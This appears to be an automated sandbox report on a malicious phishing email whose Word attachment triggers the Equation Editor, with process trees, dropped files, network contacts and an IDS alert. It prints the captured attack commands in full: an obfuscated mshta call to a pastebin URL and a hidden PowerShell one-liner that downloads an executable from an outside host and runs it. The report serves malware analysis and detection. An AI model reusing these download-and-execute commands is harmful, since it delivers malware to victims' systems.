File name: | 43kmtj46DnzR1nw.eml |
Full analysis: | https://app.any.run/tasks/c7c21efa-b9a1-4445-970b-01594b08086a |
Verdict: | Malicious activity |
Analysis date: | January 23, 2019, 06:01:28 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | message/rfc822 |
File info: | RFC 822 mail, ASCII text |
MD5: | 78F23EBA15B7FC7A6BC11C13F8801C96 |
SHA1: | 9D224C96DFC43971CECA90648DED6084A6B4FAB9 |
SHA256: | 55B0163E69C738C5B909CC0FA1C591FB0ECDC75FCC460172DB45F169E1BA097C |
SSDEEP: | 3072:sD431r7XVc/VqL2QP7Q6lF6JHnO/0Y+Dy+ln8GHPgHjN:sDu1rZc/VqL2QP7Qaoztl8GHPgHjN |
.eml | | | E-Mail message (Var. 5) (100) |
---|
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3008 | "C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE" /eml "C:\Users\admin\AppData\Local\Temp\43kmtj46DnzR1nw.eml" | C:\PROGRA~1\MICROS~1\Office14\OUTLOOK.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Outlook Version: 14.0.6025.1000 | ||||
3156 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IEI6GFA6\Docs GEFCO -# 850858001894.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | OUTLOOK.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
3256 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Embedding | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Microsoft Word Exit code: 0 Version: 14.0.6024.1000 | ||||
2540 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
3380 | cMd /C mS^Ht^a ht^tp^s:^/^/pastebin.com/raw/H28nZ13U | C:\Windows\system32\cMd.exe | — | EQNEDT32.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3912 | mSHta https://pastebin.com/raw/H28nZ13U | C:\Windows\system32\mshta.exe | cMd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2772 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://www.tibetsaveandcare.org/sites/default/files/ll1.exe',$env:Temp+'\KRQVHK.Exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\KRQVHK.Exe') | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3008 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\CVR90FB.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3008 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Temp\tmp936D.tmp | — | |
MD5:— | SHA256:— | |||
3008 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Outlook\IEI6GFA6\Docs GEFCO -# 850858001894 (2).doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3156 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR2DB8.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3156 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_9505F550-0BDC-47F5-8369-D2D8469AA6C5.0\A1EA487C.doc\:Zone.Identifier:$DATA | — | |
MD5:— | SHA256:— | |||
3256 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\OICE_9505F550-0BDC-47F5-8369-D2D8469AA6C5.0\~WRS{0780EF5C-80DA-4E80-9F45-C26049E11772}.tmp | — | |
MD5:— | SHA256:— | |||
2772 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\RPN69FCWRTV9F5S504CS.temp | — | |
MD5:— | SHA256:— | |||
3008 | OUTLOOK.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\382FF3FE.dat | html | |
MD5:9F37397021A8F399805924A6572965C8 | SHA256:91D2BABFEDBBD3A617BE8305131E20DBA8558B0A58B35A526F5E6E9AB79A3994 | |||
3008 | OUTLOOK.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$rmalEmail.dotm | pgc | |
MD5:E3D23D04DE458680AB8096C3C3BC843B | SHA256:90269BB36C70BB675CAA74CBED8707FA0121F1FC5E9E19B49FFB9582A60BB775 | |||
3156 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D2587401E4D0F2F45C4D376F24DAE608 | SHA256:EB0855B4E6B8BC1FA7728FF0BD8DF473988B0CD2A549F3B02A7F6702CED6988C |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3008 | OUTLOOK.EXE | GET | — | 64.4.26.155:80 | http://config.messenger.msn.com/config/msgrconfig.asmx?op=GetOlcConfig | US | — | — | whitelisted |
2772 | powershell.exe | GET | 500 | 213.186.33.40:80 | http://www.tibetsaveandcare.org/sites/default/files/ll1.exe | FR | — | — | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3008 | OUTLOOK.EXE | 64.4.26.155:80 | config.messenger.msn.com | Microsoft Corporation | US | whitelisted |
2772 | powershell.exe | 213.186.33.40:80 | www.tibetsaveandcare.org | OVH SAS | FR | malicious |
3912 | mshta.exe | 104.20.208.21:443 | pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
config.messenger.msn.com |
| whitelisted |
pastebin.com |
| shared |
www.tibetsaveandcare.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2772 | powershell.exe | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |